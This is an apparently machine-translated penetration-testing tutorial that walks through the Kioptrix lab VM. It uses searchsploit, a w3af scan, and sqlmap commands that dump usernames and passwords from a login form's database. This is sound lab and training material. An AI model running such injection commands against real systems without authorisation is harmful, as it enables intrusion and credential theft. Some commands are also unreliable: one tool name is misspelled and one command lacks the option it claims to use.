Penetration test exploits exploit exploits

1. Finding related vulnerabilities in the target system

In the previous post of penetration testing, the method of collecting information about the target system was introduced. Next, arbitrary kioptrix target drone as an example, the detailed utilization process of the related vulnerability is described in detail.
On the exploit-db.com website, it is generally possible to find valuable information about a known vulnerability and a proof-of-concept code (POC) that validates its validity. The proof-of-concept code can help you understand the rationale and mechanism of the vulnerability, allowing you to determine whether the safeguards are working properly.

2. Offline Vulnerability Library

In Kali Linux, a vulnerability library is automatically included /usr/share/exploitdb/ . Use the Searchsploit command to search for vulnerabilities.
　　# searchploit samba

　　

　　
This is a list of the Samba server corresponding version of the various vulnerability information, carefully review, and not our target system Samba server (previous Chapter blog post last scan listed) 3.0.28a related vulnerabilities, then we can go online search, also can update the local vulnerability library, not detailed here.

3. Using the W3AF tool

W3AF is an artifact used by web vulnerability scanning. Here's how he uses this. Enter it at the end of the Kali Linux Terminal w3af_gui and launch its GUI version.

　　

　　
Then select "Full_audit" in the scan config, tick the bruteforce plug-in, then enter the URL of the destination target drone in the target Address bar and click "Start" to start the scan.

　　

　　
You can view the scanned logs in the Log tab bar.

　　

　　
In the Result tab bar you can view the results of the scan, in the results you can see some red flagged vulnerabilities, there is a sqli (SQL injection) vulnerability, click_hajacking vulnerability. These are vulnerabilities that can be exploited.

4. Using Sqlmap for SQL injection

1). Use the Sqlmap command to dump the database information needed for the intrusion.
　　# sqlmap -u 192.168.50.102/checklogin.php --data mypassword=1

* * NOTE: The login service provided by **192.168.50.102 is a post method, with the –data option followed by the content to be sent.

　　

Use the following command to list all databases.
sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1

　　

　　
To view the contents of the members database:
　　sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members --tables

　　

　　
List column names for tables:
　sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members --columns


　　

　　
List the contents of the table:
　　# sqlmap -u http://192.168.50.102/checklogin.php --data mypassword=1 -D members -T members -C username,password --dump
　　

　　

Penetration test exploits exploit exploits